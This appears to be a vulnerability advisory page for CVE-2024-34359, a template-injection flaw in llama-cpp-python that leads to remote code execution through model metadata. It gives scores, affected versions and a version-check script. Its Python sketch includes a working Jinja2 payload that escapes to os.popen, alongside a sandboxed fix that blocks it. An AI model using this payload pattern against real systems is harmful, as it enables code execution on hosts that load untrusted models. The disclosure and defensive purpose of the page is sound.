
CVE-2024-34359

llama-cpp-python vulnerable to Remote Code Execution by Server-Side Template Injection in Model Metadata

  • Severity Score: 9.6 (CVSS v3.1)
  • Exploit Likelihood: - (EPSS)
  • Affected Versions: - (CPE)
  • Public Exploits: 0 (Multiple Sources)
  • Exploited in Wild: - (KEV)
  • Decision: Attend (SSVC)
Description

llama-cpp-python is the Python bindings for llama.cpp. `llama-cpp-python` depends on the `Llama` class in `llama.py` to load `.gguf` llama.cpp or Latency Machine Learning models. The `__init__` constructor of `Llama` takes several parameters that configure how the model is loaded and run. Besides NUMA and LoRA settings, tokenizer loading, and hardware settings, `__init__` also loads the chat template from the targeted `.gguf` file's metadata and passes it to `llama_chat_format.Jinja2ChatFormatter.to_chat_handler()` to construct `self.chat_handler` for the model. However, `Jinja2ChatFormatter` parses the chat template from the metadata with a sandbox-less `jinja2.Environment`, which is later rendered in `__call__` to construct the prompt for each interaction. This allows `jinja2` Server-Side Template Injection, which leads to remote code execution via a carefully constructed payload.
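
The core issue can be illustrated with a minimal sketch (not the project's actual code): rendering an attacker-controlled chat template with a plain `jinja2.Environment` lets the template reach Python internals, while a sandboxed environment rejects the same access. The template string below is a hypothetical payload for illustration only.

```python
# Minimal sketch of the vulnerability class, not llama-cpp-python's actual code.
# An attacker-controlled chat template rendered with an unsandboxed
# jinja2.Environment can walk from template globals to __builtins__ and
# execute shell commands on the host.
import jinja2
from jinja2.sandbox import ImmutableSandboxedEnvironment, SecurityError

# Hypothetical chat template as it could be embedded in a malicious
# .gguf file's metadata.
malicious_chat_template = (
    "{{ self.__init__.__globals__.__builtins__"
    ".__import__('os').popen('echo pwned-by-chat-template').read() }}"
)

# Unsandboxed rendering (analogous to the vulnerable code path): the payload
# runs a shell command and its output ends up in the rendered prompt.
unsafe_env = jinja2.Environment()
print(unsafe_env.from_string(malicious_chat_template).render())

# Sandboxed rendering blocks access to underscore attributes and raises
# SecurityError instead of executing the payload.
safe_env = ImmutableSandboxedEnvironment()
try:
    safe_env.from_string(malicious_chat_template).render()
except SecurityError as exc:
    print("payload blocked:", exc)
```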


*Credits: N/A
CVSS Scores

CVSS v3.1
  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: Required
  • Scope: Changed
  • Confidentiality: High
  • Integrity: High
  • Availability: High

CVSS v2
  • Attack Vector: Network
  • Attack Complexity: Low
  • Authentication: None
  • Confidentiality: Complete
  • Integrity: Complete
  • Availability: Complete
* Common Vulnerability Scoring System
SSVC
  • Decision: Attend
  • Exploitation: PoC
  • Automatable: No
  • Technical Impact: Total
* Organization's Worst-case Scenario
Timeline
  • 2024-05-02 CVE Reserved
  • 2024-05-10 CVE Published
  • 2024-05-11 EPSS Updated
  • 2024-08-02 CVE Updated
  • ---------- Exploited in Wild
  • ---------- KEV Due Date
  • ---------- First Exploit
CWE
  • CWE-76: Improper Neutralization of Equivalent Special Elements
CAPEC
Affected Vendors, Products, and Versions
  • Vendor: Abetlen
  • Product: Llama-cpp-python
  • Version: >= 0.2.30 <= 0.2.71
  • Status: Affected
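
The affected range above can be compared against a local install. A minimal sketch follows, assuming the `packaging` library is available; the distribution-name lookup is illustrative, not official tooling.

```python
# Minimal sketch: check whether a locally installed llama-cpp-python falls
# inside the affected range reported above (>= 0.2.30, <= 0.2.71).
# Assumes the `packaging` library is installed; the distribution name may
# also be spelled "llama-cpp-python" depending on the environment.
from importlib.metadata import PackageNotFoundError, version
from packaging.version import Version

try:
    installed = Version(version("llama_cpp_python"))
except PackageNotFoundError:
    print("llama-cpp-python is not installed")
else:
    vulnerable = Version("0.2.30") <= installed <= Version("0.2.71")
    status = "affected" if vulnerable else "not affected"
    print(f"llama-cpp-python {installed}: {status}")
```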